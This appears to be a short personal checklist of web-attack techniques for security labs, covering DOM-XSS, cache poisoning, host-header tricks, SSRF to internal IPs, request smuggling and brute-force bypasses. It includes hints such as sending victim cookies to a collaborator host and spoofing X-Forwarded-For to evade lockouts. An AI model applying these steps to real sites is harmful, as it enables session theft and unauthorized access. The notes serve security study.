Content Discovery
ffuf
git repo “/.git”
check source code
DOM-XSS
Identify
check source code for manual JS
DOM invader
ng-app?
web messages?
exploit: use DOM invader
XSS
Any user input relfected into DOM?
Web-Cache Posion
unkeyed header
X-Forwarded-Host relfected into script src
send user cookie to colaborator
unkeyed query param: utm_content
value reclected into DOM -> XSS
second host header
place second host header, which will be reflected in script src
Cached redirect
manipulate X-Forwarded-Host and X-Forwarded-Schme
Host Headers
bypass brute-force protection by setting
X-Forwarded-Host, X-Host, X-Forwarded-Server
Invalid hostname error? Try
xxx.oastify.com?TARGET.net
Valid host + internal host in same connection
internal host: localhost
Routing based SSRF
replace host with internal ip: 192.168.0.x
HTTP Request Smuggling
Brute force
stay-logged-in cookie contains username+pw
bruteforce against service
brute force protected login
30 minute ban if burte forcing
bypassig with X-Forwarded-For
Timing with long invalid password for valid user
1. BF username
2. BF password
Subtle invalid login
username bruteforce -> see any difference in response?
search for patterns in username bf -> does any response stand out?
Authentication
registration with company email
Last changed20 days ago